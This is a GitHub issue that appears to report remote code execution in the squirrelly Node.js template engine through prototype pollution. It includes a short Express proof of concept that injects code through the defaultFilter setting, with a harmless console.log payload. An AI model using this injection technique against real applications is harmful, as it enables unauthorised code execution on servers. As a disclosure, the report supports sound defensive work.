Open sayoojbkumar opened 2 years ago
RCE when combined with Prototype Pollution squirrelly-js vulnerable to RCE when Prototype Pollution exists. A attacker can have control over defaultFilter which leads to RCE
defaultFilter
To Reproduce
test.js
const express = require('express') var sqrl = require('squirrelly') const app = express() const port = 8000 constructor.prototype.defaultFilter="e')); console.log('RCE') //";//prototype pollution app.set('views', __dirname); app.set('view engine', 'squirrelly') app.get('/', (req, res) => { res.render('index.squirrelly', {'testValue':'test'}) }) app.listen(port, () => {}) module.exports = app;
index.squirrelly
<html> <html> <head> <title>RCE via pp</title> </head> <body> <p>{{it.testValue}}</p> </body> </html>
Screenshots
Package & Environment Details
RCE when combined with Prototype Pollution squirrelly-js vulnerable to RCE when Prototype Pollution exists. A attacker can have control over
defaultFilter
which leads to RCETo Reproduce
test.js
index.squirrelly
Screenshots![Screenshot from 2021-08-15 16-48-46](https://user-images.githubusercontent.com/57182519/129476689-cdba47c2-3971-45af-8bce-94d556741e73.png)
Package & Environment Details